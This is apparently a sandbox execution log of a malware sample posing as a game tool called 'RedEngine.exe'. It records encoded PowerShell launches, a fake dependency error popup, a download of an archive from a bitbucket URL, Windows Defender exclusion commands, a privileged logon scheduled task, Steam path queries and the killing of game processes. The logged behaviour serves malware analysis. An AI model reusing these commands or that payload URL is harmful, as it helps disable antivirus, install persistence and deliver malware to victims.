Source: unknown | Process created: C:\Users\user\Desktop\RedEngine.exe "C:\Users\user\Desktop\RedEngine.exe"
Source: C:\Users\user\Desktop\RedEngine.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 1251
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe ""C:\Users\user\AppData\Roaming\runHidden.vbs""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Process created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Process created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "dota2.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "cs2.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "RustClient.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "GTA5.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe  Process created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: slc.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RedEngine.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
